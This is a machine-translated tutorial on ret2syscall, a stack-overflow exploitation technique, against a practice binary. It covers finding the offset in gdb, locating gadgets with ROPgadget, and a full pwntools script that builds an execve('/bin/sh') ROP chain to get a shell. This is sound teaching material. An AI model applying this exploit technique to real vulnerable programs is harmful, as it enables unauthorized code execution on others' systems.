Shulou(Shulou.com)06/01 Report--

Video of this article:

If the text is too boring, watch the online video: https://edu.51cto.com/sd/16514

Basics:

The ret2text,ret2shellcode we talked about earlier, today we will talk about ret2syscall, that is, calling the system function to get the shell.

Here we are talking about two concepts: first, ROP (Return-oriented programming), a new type of * * based on code reuse technology, is used by existing libraries or executables to extract instruction fragments and build malicious code.

Second: Gadgets refers to the fragments of instructions in the program, sometimes we need multiple Gadget to complete our functions in order to achieve the purpose of executing commands. Gadget usually has ret at the end, because the program control (ip) is given to the next Gadget.

Step 1: analyze the program to get the overflow offset

Let's drag the program to IDA for analysis (note that 32-bit IDA is used to analyze 32-bit programs, 64-bit IDA is used to analyze 64-bit programs, and F5 can't see C pseudo-code if you don't. )

Another gets function in line 8 has an overflow vulnerability, which we already talked about in ret2shellcode. At this point, we need to use pattern offset in gdb to get the overflow offset, this time we will get it in a different way. Open ret2syscall using gdb.

Break point at the location of the gets function: B gets and then enter r to start debugging

After entering finish (end the current function call and return to the upper function)

Enter a few letters. Here I enter margin, and then enter enter.

At this point, we find that the address of ebp is 0xffffd618, the value of esp is 0xffffd5ac, the ebp to be overwritten requires the esp-ebp=0x6c bit, and the ebp with 4 bits is 112.So we need to overwrite the return value and execute our command.

Step 2: get shell

Now that we know the overflow offset, we want to execute a command, such as execve ("/ bin/sh", null,null). This is the time to design the usage of Linux when calling system functions.

The instruction called by the system function is int 0x80, which is a fixed instruction, which takes four parameters:

System call number, that is, eax should be 0xb

The first parameter, that is, the address where ebx should point to / bin/sh, is also fine with the address where sh is executed.

The second parameter, that is, ecx should be 0

The third parameter, that is, edx should be 0

If you have learned any programming language, it can be understood as int 0x80 (eax,ebx,ecx,edx). There may be questions about why eax,ebx,ecx,edx is set to these values. The answer is that the system always reads these four registers at run time, and if it doesn't write this, it won't call the execve function.

Then we have to piece together these contents bit by bit, we can't write instructions directly on the stack, we can only use the instructions in the program to piece together.

First of all, we set eax to 0xb, we can't write mov eax,0xb directly to the stack, so there is another way is pop eax, but to ensure that the top of the stack must be 0xb.

Then set ebx,ecx,edx, which is the same, so we can imagine that the data in the stack is:

Pop eax;ret

0xb

Pop ebx;pop ecx;pop edx;ret

Address of "/ bin/sh"

0

0

The address of int 0x80

So we can preserve the value of eax,ebx,ecx,edx.

So next we need to find out if there are any instructions for pop eax; and pop ebx;pop ecx;pop edx; in the program.

You need to use one tool: ROPgadget

ROPgadget-- binary. / ret2syscall-- only "pop | ret" | grep "eax"

-- only refers to only pop and ret instructions

We use 0x080bb196, which meets our expectations.

Next, look for instructions like pop ebx;pop ecx;pop edx;.

ROPgadget-- binary. / ret2syscall-- only "pop | ret" | grep "ebx" | grep "ecx" | grep "edx"

We also have exactly what we need, but the order is different from ours, and we need to change the order when organizing payload.

We are looking for the address of the string "/ bin/sh"

ROPgadget-binary. / ret2syscall-string "/ bin/sh"

The address is 0x080be408

We're looking up the address of "int 0x80".

ROPgadget-binary. / ret2syscall-only "int"

The address is 0x08049421

So now that we have everything we need, let's write payload.

Payload ='a'* offset + pop_eax_ret_addr + 0xb + pop_edx_ecx_ebx_ret_addr + 0 + 0 + bin_sh_addr + 80_addr

Get exp

From pwn import *

Sh = process ('. / ret2syscall')

Pop_eax_ret = 0x080bb196

Pop_edx_ecx_ebx_ret = 0x0806eb90

Int_0x80 = 0x08049421

Binsh = 0x80be408

Payload ='A' * 112 + p32 (pop_eax_ret) + p32 (0xb) + p32 (pop_edx_ecx_ebx_ret) + p32 (0) + p32 (0) + p32 (binsh) + p32 (int_0x80)

Sh.sendline (payload)

Sh.interactive ()

Finally, we debug the program dynamically to see how the program executes after we send payload to the program.

We put pause () before the sh.sendline (payload) in the python code so that we can interrupt the program and then debug it with gdb attach pid

Step 1: add sh.sendline (payload) to the python code, and then execute: python exp.py

Our pid to this process is 4679, so we use the command: gdb attach 4679 to debug

Type finish on the gdb command line (end the current function and return to the parent function), the program will wait for our input, we enter on the page running python, and the payload of exp.py will be entered into the 4679 process.

At this point, we find that the contents of the exp.py have been put on the stack, and then we type finish four times and the code runs into the Main function.

The content in red above is the content in our payload.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.